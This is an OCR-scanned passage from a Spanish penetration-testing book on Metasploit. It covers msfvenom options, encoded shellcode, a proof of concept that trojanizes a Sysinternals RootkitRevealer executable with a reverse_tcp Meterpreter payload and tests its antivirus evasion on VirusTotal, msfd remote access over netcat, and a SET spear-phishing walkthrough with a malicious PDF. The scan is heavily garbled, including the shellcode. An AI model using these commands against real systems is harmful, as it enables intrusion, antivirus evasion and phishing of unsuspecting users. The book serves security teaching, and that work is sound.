La herramienta msfvenom dispone de varias opciones, las cuáles se especifican a continuación, Hay 
que tener en cuenta que la funcionalidad de la aplicación puede variar en función de las o pcjones 
que se activen o se configuren. Para visualizar todas las opciones disponibles con la herramienta se 
puede ejecutar la siguiente instrucción msfvenom —h. 


Iruotabt:-4 msfverom -h " ДЕ Я 
sage: /opt/metasploit/msf3/msfvenom [options] <уаг=уа1> * | 
ptions: | 

-P, --payload [payload] Payload to use, Specify а '-' or stdin to use custom payload | 
-1, --list [module _ type] 1151 a module type example: payloads, encoders, nops, all 
-п, --nopsled [length] Prepend a nopsled of [length] size on to the payload 
-f, --format [format] Output format (use --help-formats for a 1151) 
-€, -encoder [encoder] The encoder to use 
-а, --arch larchitecture] The architecture to use 
--platform [platform] The platform of the payload ' 
-5, --Space [Length] The maximum size of the resulting payload 


-b, --bad-chars [1151] 
-1, --iterations [count] 
-с, --add-code [path] 
-х, --template [path] 


The list of characters to avoid example: 'AXO00XPf" j 
The number of times to encode the payload 

Specify an additional win32 shellcode file to include 
Specify a custom executable file to use as a template 
Preserve the template behavior and inject the payload as a n 


, --options 
‚ "help Show this message 
--help-formats List available formats 


List the payload's standard options 


Fig 5.41: Opciones disponibles con la herramienta msfvenom 


En la siguiente tabla se especifica la utilización de los distintos parámetros y la nomenclatura de 


éstos, lanto en formato reducido сото en formato semántico. 


-p | --рауіоай 


| 


Parámetro Descripción 


Se debe especificar el payload que se quiere utilizar 


A list Se debe especificar el tipo de módulos que se quiere listar, por ejemplo 
encoders, payloads, etcétera 


-n | --nopsled 


Especifica el tamaño sobre el payload : 


-f | --format 


Se debe especificar el formato de salida, por ejemplo executable, raw, etcétera 
аса о осоо о саси 


Especifica el encoder que requiere utilizar, por ejemplo x86/countdown. Esta 


-€ | --encoder сте М 
| funcionalidad es idéntica en msfencode 


Se especifica la arquitectura dónde se ejecutará el payload 


-s | -space Especifica el tamaño máximo que debe tener el payload 


Especifica el listado de caracteres que deben evitarse en fa creación del 
payload, por ejemplo, para evitar los bytes null 100” 


-b | --bad-chars 
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Parámetro ‚ Descripción 


a ii a tt 


-i | —-¿terations 


Especifica el número de iteraciones que ejecutará е} encoder 


Especifica que el payload se ejecutará en un thread. Este parámetro implementa 
la técnica de ejecutable con “plantilla personalizada sigilosa” 
=specitica una plantilla personalizable. Este parámetro implementa Ta técnica 
del ejecutable con plantilla personalizada 


-К | --keep 


template — 


=c | --adicode ermite añadir un ejecutable personalizado 


-0 | --opřions -Ista las opciones de los payloads 


A ii 


Tabia 5.01: Opciones de msfvenom. 


Creación de shellcode codificado 
La creación de un shellcode codificado se simplifica mucho con la utilización de msfvenom. Como 
ejemplo se propone la utilización de los parámetros -payload, --encoder --iterations y —bad-chars. 


En primer lugar se especifica qué tipo de payload se quiere utilizar, por ejemplo, windows/ 
meterpreter/reverse_tcp. Con el parámetro --encoder se indicará qué algoritmo se desea utilizar 
para llevar a cabo la codificación del código, en busca de la evasión de los antivirus. Para еї ejemplo 
se utilizará ег encoder x86/shikata_ga_nai. Con el parámetro —bad-chars se indica la lista de bies 
que no se quieren generar en el proceso. Además se evitará crear código que contenga el byre N0. 


PA A aa 


rootábt:-+* msfvenom --payload windows/meterpreter/reverse_tcp --encoder x86/shikata ga nai --iter] 
ations 5 --bad-chars 'Nx00' lhost=192,168,1.39 lport=4444 | 
[1] х86/5һ1Каїа да паі succeeded with size 317 (iteration=1) | 
|[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) i 
[+] x86/shikata ga nai succeeded with size 371 (iteration=3) | 
[*] x86/shikata ga паі succeeded with size 398 (iteration=4) ; j 
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) 

uf = 

"\хБа\хВб\х27\х7а\х28\хдә\хе1\хд9\ ATAN ZA AX FAA XS TA R2Z9 XCD" 
"\хЬ1\хб4\хВзЗ\хеТ\хїс\хз1\хВТ\х1@\х@З\хБТ\х1Ө\хб4\хйа\хаё” 


+ 
+ 
"\хес\хб1\х51\х71\х19\хїа\хей\х89\хбТ\хЬ2\х49\х59\хһдӘ\хї Б" + 
"137 \хас\хб1\хе1\х44\х26\х69\х16\х13\хау\хбс\х9а\ха9\хве" + 
"\хВ4\ха2\х31\хсТ\хїЗ\хсб\хЬТ\хЗ4\ха7\х2Т\хб1\х78\х74\хВе” + 
"\хЬЧ\ха2\хЗ7\х2с\хЫЗ\хӨа\х7Г\хЬЗ\хве\хе4\ха4\х4Б\хВ8\х69” + 
"\хс\хӨ9\х6бб\хе4\х5е\х59\хсї\х?е\хав\ х2е\х5б\хве\х55\х41" + 
"х27\х79\хба\х4е\хө\х#5\хеѓ\хеб\х#з\хсе\хїс\хав\хза\хдв" + 
"\х7З\х7\хаз\х1з\хйЧ\хёс\х82\хсз\х7%\х97\хЬТ\х7В\хВ2\хёв" + 
“\х42\хсб\х18\х4е\хзТ\хсб\х@Т\хд4\х1б\хв7\хб5\хЬВ\х1Ь\х54" + 
"\хбВ\х9З\х®7\х@е\хбв8\х67\хТБ\ХхБЧ\хЗВ\хс@Ч\хВВ\хае\х27\х44" + 
"\хһӘ\х54\х12\хбт\хёс\хб6б\х5а\х@7\х34\хТТ\х1Т\х7а\х51Т\х97” + 
"\х26\х52\ха7\х9а\х22\х13\х26\х09\х57\хеб\х1с\хЬ7\хҒа\х1Ь* + 
"\хес\х40\х5а\хса\хЬс\хба\хӣ2\хт\хӣ\х9#\х5с\ха4\хба\хїѕ" + 
"\ХЭӨ\х20\х56\х57\х65\хде\хіе\хес\х?Б\хӨ8\хБа\хба\х+#ѕ\хЬб" + 
м\х5с\хЗ2\хб9\хї7\хбс\хб1\х7Ь\х87\х50\ха1\хзі\х4\х96\х1с" + 
"\хеб\х1е\хаб\х18\х89\х18\х10\х92\х3\х34\х27\хей\хс@\хөБ" + 
"\xcd\xab\x61\x32\x4b\x2e\x09\xec\x3a\xla\xbd\x21\x13\x9d" 


Fig 5.42: Generación de shellcode codificado sin bytes nulos. 


+ 
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PoC: Creación de ejecutable codificado con msfvenom 

En esta prueba de concepto se creará un ejecutable para sistemas Windows con la herramienta 
msfvenom. Además, se probará mediante el uso de Virus Total si el ejecutable es efectivo en la 
evasión de antivirus, | | e 4 


У 


Se utilizará la técnica de la plantilla personalizada para crear el ejecutable, ya que como se ha vistd 
anteriormente se consigue evitar a un mayór número de antivirus. No se utilizará la técnica дещ 
thread para lanzar el payload. 


El ejecutable que se utilizará como plantilla es la herramienta RootkitRevealer de Sysinternals, 
Esta herramienta permite detectar posibles rootkits ejecutándose en un sistema Windows. Lo que 
se pretende es utilizar la imagen de una aplicación que es utilizada para detectar amenazas рагай 
inyectar un payload y convencer al usuario victima de que la ejecute. 


А „ rootkitRevealerCodificado 
P Rootkit detection utility 


Sysinternals - www, sysinterma. ., 


Fig 5.43: Archivo ejecutable rootkitRevealerCodificado.exe. 


Para crear el ejecutable con la plantilla de RoorkitRevealer se utilizará el parámetro —template 
para indicar la ruta donde se encuentra dicho ejecutable. En la imagen se puede visualizar como 
© utilizan los parámetros comunes que se utilizan en msipayload y en msfencode, todo ello en una 
única herramienta. 


CAUCE атамай зна анааан = 
root@bt:-# msfvenon --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata 


та паі --iterations 10 --template /root/rootkitrevealer.exe lhost=192,168.1.37 lport=4444 > rootk 
litRevealercodificado.exe 
[L>] x86/shikata_ga_nai succeeded with size 317 (iteration=1) 
lx] x06/shikata ga паі succeeded with size 344 (iteration=2) 
|] x86/shikata_ga_nai succeeded with size 371 (iteration=3) 
[+] х8б/ѕһіката да nai succeeded with size 398 (iteration=4) 
1+] xB6/shikata ya toi succeeded with size 425 (iteration=5) 
11*] x86/shikata_ga nai succeeded with size 452 (iteration=6) 
[ba х86/ѕһіКаќа да nai succeeded with size 179 (iteration=7) 
[* х86/5һіКаїа да паі succeeded with size 506 (iteration=8) 
IDA xB8/shikata_ga nai succeeded with size 533 (iteration=3) 
М x86/shikata_ga_nai succeeded with size 560 (iteration=19) 


Гане 


Fig 5.44: Creación de archivo ejecutable con msfvenom, 


Tras crear el ejecutable y distribuirlo a las posibles víctimas sería conveniente comprobar el estado 
de los antivirus respecto al archivo malicioso. Se procede a la subida y análisis del archivo por parte 
de Virus Total. | 


Los resultados indican que la mitad de los antivirus que se encuentran en Virus Total detectan el 
archivo. El porcentaje de éxito sería por lo tanto de un 50% en este caso. Ya se había comprobado 
enel apartado dedicado a msfencode сото la técnica de plantilla personalizada devolvía los mejores 
resultados. 
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' SHA256: 68b289c418268/2dc395394115214dce5437 dd31928848a086778dc62123afa8 
Hombre: rootkitRevealerCodificado. exe 
Detecciones; 20740 


Fecha de análisis: 2012-08-25 15:25:33 UTC ( hace 1 minuto ) 


Le 
б 


ás detales 


Fig 5.45: Resultados obtenidos de virus total de la creación de ejecutable con msfvenon. 


б. Msid: Gestión remota 


Esta aplicación es un demonio o servicio que ofrece la posibilidad de conectarse de manera remota 
al framework. Hay que tener en cuenta que cuando varios clientes se conectan a este servicio, 
realmente están utilizando la misma instancia del framework. Msfd proporciona a los pentesters de 
un servicio global qué se puede utilizar y ofrece el potencial de Metasploit de manera independiente 
a la máquina que se esté utilizando. Simplemente con disponer de una conexión a Internet o a una 
red interna, se puede utilizar el potencial y flexibilidad del framework. 


Para obtener ayuda en el uso de la herramienta ms/d se dispone de la instrucción msfd —h. Con esta 
instrucción se obtiene información del uso y las posibilidades que ésta ofrece. Las opciones se 
estudiarán a continuación y se ilustrará mediante el uso de ejempios las posibilidades reales de la 
aplicación. 


Opciones de msfd 

La aplicación, en principio, parece menos configurable de lo que realmente es. Se pueden realizar 
diversas tareas como fortificar la conexión entre el auditor y el framework, configurar el puerto que 
se desee, implementar una lista de hosts desde los que se puede conectar a Metasploit, etcétera. En 
la siguiente tabla se muestran las distintas opciones y funcionalidades que ofrece ms/d. 


A TINA 
| Parámetro Descripción 


Se especifica una lista con las direcciones 1P desde las que se permiten realizar | 
conexiones al framework. 


Asocia la dirección ЇР proporcionada а la instancia del framework. 
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Se especifica una lista con las direcciones ІР desde las que no se permiten realizar | 


-D . se 
conexiones al framework. | 
Ñ і эз хол 
-{ Ejecuta el servicio en primer plano. | 
р Asocia un puerto a la instancia. 


F, | 
-S Utiliza SSL para fortificar la conexión. | 
чыл кысы. шеш A o кыры 4 


Tabia 5.02: Opciones de туа 


Como curiosidad puede llamar la atención no disponer de una autenticación para utilizar el ¡rumework 
en remoto, Aunque pueda parecer extraño, si se requiere fortificar еі uso del framework es mejor 
utilizar protocolos como SSH, Secure SHell, para proteger tanto el canal como el acceso a éste, 


PoC: Conexión en un puerto personalizado y preparando exploit 
En esta prueba de concepto se utilizan dos máquinas bien diferenciadas. En la primera se está 
ejecutando una distribución de BackTrack 5 donde se configurará el servicio ms/d de manera 
personalizada. La segunda máquina es un Windows XP, aunque este hecho no es relevante ya que 
funcionaría exactamente igual en una versión como Windows 7. En la máquina con Windows XP se 
conectará con el servicio msfd a través de la herramienta Netcat, la cual es conocida en el mundo de 
la administración y la seguridad como la “navaja suiza”. 


En primer lugar se configura la aplicación туй con los siguientes parámetros: 


- El servicio se ejecutará en segundo plano. Este hecho ya viene configurado por defecio, 
si se quisiera realizar la ejecución en primer plano, bloqueando la shell de este modo, se 
ejecutaría el parámetro —£. | 

- Е! servicio aplicará una lista con direcciones ІР donde se especificarán las que no pueden 
conectarse remotamente, 


- El servicio aplicará una lista con direcciones ЇР donde se especificarán las que si se 
pueden conectar remotamente. 


- Е! servicio se ejecutará a la escucha en el puerto 9000. 


- El servicio se enlazará con la dirección IP 192.168.1.40 que es la que pertenece a la 
máquina con BackTrack en esta prueba de concepto. 


En la imagen se puede visualizar como se configura la aplicación y ésta se ejecuta en segundo plano 
o background. | 


root@root:-# msfd -p 9000 -A 192.168.1.35,192.168.1.36 -0 192,168.1.34 -a 192.168.1.40 
[*] Initializing mstfd... 

[*] Running mstfd... і | 

гоо1@гоої:-# | 


Fig 5.46: Configuración y ejecución de la aplicación ms/d. 
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Tras dejar el servicio preparado, la máquina con Windows ХР y la aplicación Netcat disponible 
realizará la conexión. Para ello, simplemente se debe ejecutar la instrucción nc.exe <dirección 1P> 
<puerto>, en este caso пс:ехе 192.168.1.40 9000. Se puede utilizar el parámetro —v para visualizar 
las operaciones que está realizando la herramienta. 


Si todo sucede correctamente se podrá visualizar el banner de Metasploit en la línea de comandos 
de Windows y se dispondrá de la consola del framework de manera remota. 


.168, 1:10: 9098 


kak 


Uig 5.47: Conexión remota al framework mediante el uso de Netcat, 


Una vez que se dispone del control de la instancia del framework de manera remota, los comandos 
son exactamente iguales que si se estuviera en local. Por eso, para cargar el módulo exploitímulti/ 
handler se utiliza el comando use. Como se puede visualizar en la imagen se utilizan los mismes 


pasos para la configuración del módulo. 
ploitrny 
1 09Ввала Le 
meterve ГЫ: ср pir 
alera CE set LMOST 492, 
GPA 03). show options, 
ойе explo it/naltičhandlér): 


iret Degeri 


L iee tu vpn. pia me net arv ma saa aami 


pratt м. e Y O Exit techniquez seh. 


1HOSP192.,168.1.35 


| The" Listen addresy Ыз Т 
y PORT de “Фад i 


The: Listen port С 
xploit targets 
d Ма 
ам Target 


ГӨЗ exploit Св ћапа Тоз» C9 | | 
Fig 5.48: Configuración exploit/multi/handler a través de Меїсаї, 
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7. Manipulación de memoria 


Las herramientas disponibles en el framework para la manipulación y análisis de memoria se centran 
en el desensamblaje de las aplicaciones. ¿Cuál es el objetivo de este tipo de aplicaciones? El fín es 
estudiar el código en ensamblador de dichas aplicaciones, poder visualizar y conocer variables y las 
posiciones en memoria de éstas e instrucciones de la aplicación. 


Estas acciones son realizadas normalmente por los investigadores de seguridad en busca de 
vulnerabilidades en las aplicaciones. El código en ensamblador es realmente el que es ejecutado, 
es por ello que si el investigador lo conoce puede determinar en qué lugar puede manipular el BIP, 
puntero de instrucción, del cual ya se comentó en el apartado dedicado a ms/payload. En definitiva 
se busca obtener vulnerabilidades de tipo buffer overflow. 


El framework dispone de las herramientas msfelfscan y msfpescan para estudiar y analizar el código, 
¿xisten otras herramientas compatibles con las acciones que realizan las mencionadas anteriormente, 
como son findjmp2, windbg о memdump. 


Msfelíscan y msfpescan 

La herramienta msfel/fscan permite escanear y analizar aplicaciones ELF en sistemas GNU/Linux. 
Por otro lado la herramienta ms/pescan permite escanear o analizar ficheros ejecutables y DLLs de 
sistemas Windows. Se pueden encontrar instrucciones en ensamblador sobre una imagen de memoria 
de la aplicación. | 


Para obtener una imagen de memoria de una aplicación, ésta debe ser lanzada en el sistema objeto, 
ya sea Windows o GNU/Linux. Una vez se conoce el PID, identificador del proceso, se pueden 
ejecutar herramientas como Memdump, mencionada anteriormente para crear la imagen de la 
memoria del proceso. Tras haberse realizado el volcado de memoria anterior se puede analizar con 
las herramientas msfelfscan o msfpescan. 


Estas herramientas suponen un conccimiento en ingeniería inversa importante y requiere 
conocimientos básicos sobre este tipo de arte. | 
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Capítulo VI 
Ingeniería social con SET 


1. Ingeniería social | 


La mgeniería social es el medio por el que los usuarios maliciosos о delincuentes computacionales 
manipulan a los usuarios para lograr acceso ilícito a la información, credenciales, escalar privilegios, 
etcétera. | 


El principio de la ingeniería social es que la parte más débil de todo sistema es eljusuario, es por ello 
que concienciar a éstos debe ser una de las prioridades de toda empresa. Los medios qué el ingeniero 
social utiliza, generalmente, son el teléfono e Internet. En cierto tipo de auditor iag también puede ser 
válido hacerse pasar por otros compañeros de trabajo, con el fin de sacar el máximo de información. 


El ingeniero social puede utilizar técnicas como la suplantación de webs, envío de maiis con 
peticiones de recordatorios de contraseñas, envío de SMS falsos con enlaces a páginas webs bajo 
el control del ingeniero social, la cual suplanta a otra web conocida, etcétera. Todas estas lécnicas 
están, hoy en día, muy optimizadas, lo cual hace que, en algunos casos, diferenciar la web falsa o 
phishing sea complicado para un usuario, 


El usuario, generalmente, tiene un comportamiento predecible o acciones automatizadas cuando se 
enfrenta a ciertas páginas, por lo que si no se toman las medidas adecuadas, éste puede ser estafado 
vía Internet, por ejemplo con un phishing de la página web de su banco, en la que tras introducir 
las credenciales, se redirija al original o se alerte al usuario de que el sitio web no se encuentra 
disponible en esc momento. 


Uno de los ataques más comunes, y a la vez más simples, y efectivos es engañar a un usuario рага que 
piense que un sistema le está solicitando su contraseña para ciertas acciones. Muchos de los usuarios 
de Internet reciben, frecuentemente, mensajes que le solicita este tipo de información, credenciales 
de cuentas, de bancos, tarjetas de crédito, con el motivo de crear una cuenta, por ejemplo. Este tipo 
‚Че ataques, como se mencionó anteriormente, se denominan phishing y es una plaga en Internet. 
Actualmente, los bancos y propietarios de este tipo de sistemas advierten periódicamente a los 
usuarios para que no revelen información sensible, como tarjetas de crédito, credenciales, etcétera, 
por Internel, ya que este tipo de información nunca se solicitará por este medio. 
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Existen olros métodos propios de la ingeniería social más clásica como es la revelación de las 
contraseñas a cambio de otros objetos. Se realizó esta prueba en una oficina de Londres donde un 
alto porcentaje de los empleados revelaron su contraseña a cambio de un simple bolígrafo. 


Otro de los métodos clásicos de la ingeniería social es el uso de los archivos adjuntos en emails, en 
los que se ofrece fotos, aplicaciones, documentos ofimáticos los cuales ejecutarán código malicioso, 
con el objetivo de troyanizar la máquina de la víctima, En tal caso, dicha máquina puede ser utilizada 
para formar parte de una botnet, y poder así enviar mails a modo de spam, entre otras acciones 
maliciosas. En realidad, se necesita que el usuario ejecute estos archivos adjuntos, pero es cierto 
que muchos de los usuarios de Internet abren a ciegas los archivos que reciben en sus correos 
electrónicos, haciendo fuerte este método de ataque. 


Históricamente, como se puede ver en ciertas películas de hackers la ingeniería social presenta su 
cara más Visible en la manipulación cara a cara para la obtención de acceso а los sistemas. Un posible 
ataque dirigido puede comenzar con el proceso de ingeniería social, es decir, el conocimiento de la 
víctima. ' 


La defensa contra la ingeniería social es el sentido común, y concienciar a los usuarios de fos 

sistemas de la información de que acciones se pueden pedir a través de los medios telemáticos, 
сото manejar el correo electrónico, no fiarse de correos sospechosos, navegación segura, evitar los 

enlaces acortados o enlaces sospechosos, utilización de plugins que ayuden a la navegación segura, 

etcétera. | | 

{ 

Posiblemente el ingeniero social más famoso de la breve historia de la informática es Kevin Mitnick, 

al cual sd le hizo una película sobre su vida. Según Kevin Mitnick la ingenieria social se basa en 

cuatro principios que se enumeran a continuación: 


= | Todo el mundo quiere ayudar, 


| El primer movimiento es siempre de confianza hacia el otro usuario. - 


Al ser humano no le gusta decir no. 


A tado el mundo le gusta que le alaben. 


2. ¿Qué es y qué propone? 


SET o Social Engineer Toolkit es un script que proporciona al auditor un conjunto de herramientas 
relacionadas con la ingeniería social. Este conjunto de herramientas se integra con Metasploit para 
realizar ingenieria social y la intrusión en los sistemas remotos, 


SET ofrece una aplicación que centraliza todas las funcionalidades necesarias para realizar ingeniería 
social a través de medios telemáticos, todo para realizar piratería de la mente humana. El propósito 
principal de SET es aportar a la comunidad y a los auditores la posibilidad de utilizar pruebas 
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basadas en la ingeniería social para obtener resultados y comprobar 


la conciencia de los empleados 
de una empresa. 


El conjunto de herramientas que forman SET atacan debilidades humanas, las cuales 
curiosidad de los usuarios, credibilidad o avaricia. Este tipo de ataques, como se 
este capítulo pueden llegar a ser muy avanzados en la actualidad. 


aprovechan d 
podrá estudiar end 


Muchos especialistas en este tema piensan que la ingeniería social es uno de los mayores riesgos 4 
los que se enfrentan las empresas hoy en día, ya qué es realmente difícil proteger a éstas de un ataque 
de este estilo. | 


Un vector de ataque en seguridad informática es la vía utilizada para obtener acceso, ya sea a ¡ol 

А , r » , . > . г d ` 
мадита remota, máquina ¡ocal, información, credenciales, etcétera. SET clasif 
vectores de ataque de la siguiente manera: 


ica los ataques of 
- Vector de ataque: phishing. 

- Vector de ataque: web. 

- Medios o dispositivos infectados. 

- Payloads como ejecutables. 

- Ataques por correo electrónico. 

- Falsificación de SMS. 


Welcome to the Social -Engineer Toolkit (SEY). Your one 
stop shop tor all of your sgeial- engineering needs.. 


DerbyCon 2011 Sep30-0ct02 - http://www.derbycoh.com 
Select from the menu: 


1. Spear-Phishing Attack Vectors 
Ї Website Attack Vectors 
. Infectious Media Generator 
4, Create a Payload and Listener 
5. Mass Mailer Attack 
6, Teensy USB HID Attack Vector 
7, SMS Spoofing Attack Vector 
8. Wireless Access Point Attack Vector 
9. Third Party Modules 
10. Update the Metasploit Framework 
11. Update the Social-Engineer Toolkit 
12. Help, Credits, and About 
13. Exit the Socíal-Engineer Toolkit 


Enter your choice; 


Fig 6.01: Menú de opciones de SET. 


Los vectores de ataque mencionados anteriormente disponen de distinta + 


| o | asa de éxito, realmente 
depende del destinatario y de la calidad del ataque. SET viene con pl 


antillas de correo electrónico 
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y sitios web por defecto, los cuales pueden ser utilizados para realizar ingeniería social. SET se 
encuentra disponible en la siguiente ruta, en una distribución BackTrack 5, /pentest/exploits/sel. 


Configuración de SET. | 

La configuración de SET se puede realizar a través del fichero de configuración que se encuentra 
en la ruta /pentest/exploits/set/config/set_config. Existen distintas variables que deben estar bien 
configuradas para sacar el máximo provecho a SET. A continuación se irán enunciando distintas 
variables que ayudan a aprovechar las distintas opciones y vectores de ataque que SET consigue 
explotar gracias a la ingeniería social. | 


La primera variable que se presenta es METASPLOIT_PATH. Esta variable indica a SET en que 
ruta se encuentra instalado el framework de Metasploit. La variable SELF_SIGNED_APPLET 
viene deshabilitada por defecto y es recomendable activarla. Esta variable indica si el apple? será 
firmado con el publicador que se quiera suplantar, siempre y cuando el JDK se encuentre instalado, 
Esta variable se utiliza para el ataque de web basado en el applet de JAVA, el cual se encuentra 
autofirmado. 


La variable AUTO_DETECT viene activada por defecto y proporciona la posibilidad de configurar 


automáticamente la dirección TP que se asignará a los servidores web. Es recomendable desactivar 
esta variable si se utilizan distintas interfaces o si el listener inverso que espera la conexión se 
encuentra en otra ubicación y no en la máquina local. 


La variable APACHE SERVER viene deshabilitada por defecto, y es recomendable activarla ya que 
Apache es un servidor web muy potente y configurable. El servidor web que SET utiliza por defecto 
está basado en Python y con menos potencial que Apache. Otra variable relacionada соп Apache 
es APACHE DIRECTORY, la cual especifica en qué ruta se encuentra instalado el servidor web 
Apache. 


Otra variable interesante es WEB_PORT con la que se especifica el valor del puerto en el que se 
montará por defecto el servidor web, por ejemplo del ataque del applet de JAVA. 


AUTO _MIGRATE es una variable muy importante en la configuración de SET. Por defecto se 
encuentra desactivada. Si esta variable se encuentra activa, cuando se realice la explotación, el 
payload migrará automáticamente a otro proceso, como es el creado por defecto, notepad.exe. Esta 
configuración puede introducir ciertos fallos en el proceso global, aunque aun así es aconsejable de 
utilizar, 


, 


La variable METASPLOIT IFRAME PORT indica el puerto utilizado para realizar un ataque de 
iframe injection usando la técnica de browser autopwn, vista con anterioridad en este libro. Por 
defecto el valor de la variable es 8080. Otra variable interesante de Metasploit en el archivo de 
configuración de SET es METERPRETER_MULT[_COMMANDS establece qué comandos se 
quieren ejecutar cuando una sesión de Melerpreter es conseguida. 


Capitulo ҮІ, Ingeniería social con SET 


Para elegir qué herramienta realizará la técnica de DNS Spoofing existe la е DNSSPOOF 
» . А a . І а $ 
PATH. Es interesante estudiar esta técnica para realizar un phishing control | үз 


iode asume ado por el atacante en 
a . 


La variable ACCESS_POINT_SSID indica qué nombre recibirá el punto d 
SET. Es interesante para ataques de suplantación de AP o puntos de 
ingeniería social a redes wireless. 


e acceso falseadó con 
acceso, en los típicos ataques de 


Estos son algunos ejemplos de variables importantes del fichero de соп figuración de SET. Como 
se puede ver es altamente recomendable visualizarle y os 


S. а que es muy potente y puede cambiar 
fácilmente, el comportamiento de la herramienta. а | 


3. Vector de ataque: phishing 


Este vector de ataque automatiza el proceso de envío de Correos electrónicos. tanto vía Sendmail 
como Gmail, que llevan adjuntos archivos maliciosos, los cuales contienen APN tipo de exploit 
La victima recibirá el correo electrónico y puede abrir el archivo adjunto provocando una о 
explotación de su sistema. SET puede utilizar el protocolo SmTp para realizar envíos E de 
correo electrónico o utilizar una cuenta de Gmail para realizar dicha acción. 


En este vector de ataque también figura la posibilidad de enyj 
phishing mediante contenido HTML, Normalmente, este ti, 
masiva, ya sea un ataque dirigido o no dirigido. 


ar correos para realizar ataques de 
20 de alaques se realiza de manera 


Para poder realizar spoofing del correo electrónico en este tipo de vía se debe cambiar el valor de la 

ji . A í G A 
variable SENDMAIL, la cual por defecto viene desactivada en el fichero de configuración de SET 
por el valoron. De todos modos al seleccionar esta opción en el menú de SE 


Ыя > | Т, la propia aplicación 
comunicará esta acción al usuario. 


PoC: Ataque dirigido a un dominio 

En esta prueba de concepto se utiliza la herramienta SET para realizar un ataque de phishine ví: 
correo electrónico. El objetivo es una empresa ficticia о a 
tiene en plantilla a un gran número de empleados. La acción a realizar será enviar un gran número 
de mails al dominio de dicha empresa con un archivo malicioso adjunto, obteniendo previamente 
direcciones de correo electrónico de dicha empresa. Se sabe que la ШОН de los empleados 
visualizará el correo, pero no abrirán el archivo adjunto. Los usuarios que sí ejecuten el archivo 
adjunto pondrán a prueba la fortaleza de sus sistemas. 


Para llevar a cabo este ataque en el menú de SET se elegirá la primera opción “Spear-Phishing 
Attack Vectors”. | 


` 
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Select from the menu: 


Spear-Phishing Attack Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Hass Mailer Attack 
Teensy USB HID Attack Vector 
SMS Spoofing Attack Vector 
Wireless Access Point Attack Vector 
. Third Party Modules 
‚ Update the Metasploit Framework 
. Update the Social-Engineer Toolkit 
. Help, Credits, and About 
. Exit the Socíal-Engineer Toolkit 


Enter your choice: 1 


Fig 6.02: Elección de Spear-Phishing Attack Vectors 


Tras la elección del vector de ataque se debe elegir entre varias opciones: 


- Perform a Mass Email Attack. Realiza un envío masivo de correos electrónicos sobre una 
organización. Esta opción es la válida en esta prueba de concepto, 


- Create a FileFormat Payload. Crea el archivo malicioso y lo deja a disponibilidad del 
usuario. ' 


- Create a Social-Engineering Template, Permite crear nuevas plantillas para el envio de 
mails. | 


Welcome to the SET E-Mail attack method. This module allows you 

to specially craft email messages and send them to a large (or small) 

number of people with attached fileformat malicious payloads. If you 

want to spoof your email address, be sure “Sendmail” is installed (it 

е installed іп BT4) and change the config/set_config SENDMAIL=0FF flag 
о SENDMATL=0N, 


There are two options, опе is getting your feet wet and letting SET do 
everything for you (option 1), the second is to create your own FileFormat 
payload and use ії іп your own attack. Either way, good luck and enjoy! 


1. Perform a Mass Email Attack 

(2. Create a FileFormat Payload 

3. Create a Social -Engineering Template 
4. Return to Main Menu 


Enter your choice: 1 


Fig 6.03: Elección de Perform a Mass Email Attack 


Tras elegir el método de ataque que se utilizará, SET proporciona una lista de formatos de archivos 
que se pueden usar para adjuntar al correo electrónico. En este caso la elección será el archivo 
PDF con el exploit Embedded EXE Social Engineering de Adobe, con el que se creará un archivo 
PDF malicioso el cual inyectará un payload en la máquina remota, siempre y cuando la versión de 
Adobe Reader sea vulnerable. Lo importante en este punto es la variedad y, a la vez, resumen de 


{vou have selected the default payload. creation. SET will generate a normal PDF with embedded EXE 
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— EN 


| ; i 
exploits que proporciona SET para el auditor. No hace falta recordar todas las posibilidades para 


- crear archivos maliciosos, SET las ofrece a través de menús con interacción con el usuario. 


Select the file format exploit you want. 
Тһе default is the POF embedded ЕХЕ, 


жеее PAYLOADS Arcor 


SET Custom Written BLL Hijacking Attack Vector (RAR, 21Р) 

SET Custom Written Document UNC LM SMB Capture Attack 
Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 
Microsoft Word ВТЕ pFragments Stack Buffer Overflow (MS10-987) 
Adobe Flash Player 'Button' Remote Code Execution 

Adobe CoolType SING Table 'uniqueName' Overflow 

Adobe Flash Player 'newfunction' Invalid Pointer Use 

Adobe Collab,collectEmailInfo Buffer Overflow 

Adobe Collab.getIcon Buffer Overflow 

10. Adobe JBIG2Decode Memory Corruption Exploit 

11. Adobe PDF Embedded EXE Social Engineering 

12. Adobe util.printf{} Buffer Overflow 

13, Custom EXE to VBA (sent via RAR) (RAR required) 

14. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 

15. Adobe PDF Embedded EXE Social Engineering (№075) 
16. Foxit PDF Reader v4.1,1 Title Stack Buffer Overflow 
‚ Nuance PDF Reader v6.9 Launch Stack Buffer Overflow 


9 95 JO A LUN m 


Enter the number you want (press enter for default): 11 


Fig 6.04: Elección de PDF Embedded EXE Social Engineering 


Este tipo de ataque permite elegir entre un PDF en blanco, el cual tras ejecutarle no muestre ningún 


- contenido pero sí intente ejecutar el payload, y entre un PDF ya creado con anterioridad. Con la 


segunda opción se intenta dotar al PDF de mayor credibilidad en el arte de la i ingeniería social. Para 
la prueba de concepto se utiliza la opción del PDF en blanco, 


1. Use your own PDF for attack 
2, Use built-in BLANK PDF for attack 
m your choice (return for default): 2 


Fig 6.05: Elección de PDF blank 


En el siguiente paso 5с debe seleccionar el payload que se quiere utilizar. La elección del payload, 


como se ha mencionado con anterioridad en este libro, es muy importante y SET ofrece una lista de 


variantes. 


Los payloads disponibles dependerán del exploit que se esté utilizando, ya que hay que recordar 
que no todos los payloads valen para todos los exploits. En este caso se utiliza ип Meterpreter de 
tipo reverse por TCP. Con este Meterpreter se pedirá que se indique el puertó a al пе Se conectará el 
payload, por ejemplo el 4444, 


ЕТЕ Metasploit para Pentesters 


1. Windows Reverse TCP Shell 
ker. 

2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to а 
ttacker. 

3. Windows Reverse VNC DLL 


Spawn a command shell on victim and send back to attac 


Spawn а VNC ѕегуег on victim and send back to attacker 


. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 
. Windows Meterpreter Reverse TCP (X64) Connect back to the attacker (Windows x64}, Meterprete 


. Windows Shell Bind TCP (X64) 
system. 


Execute payload and create an accepting рогї оп remote 


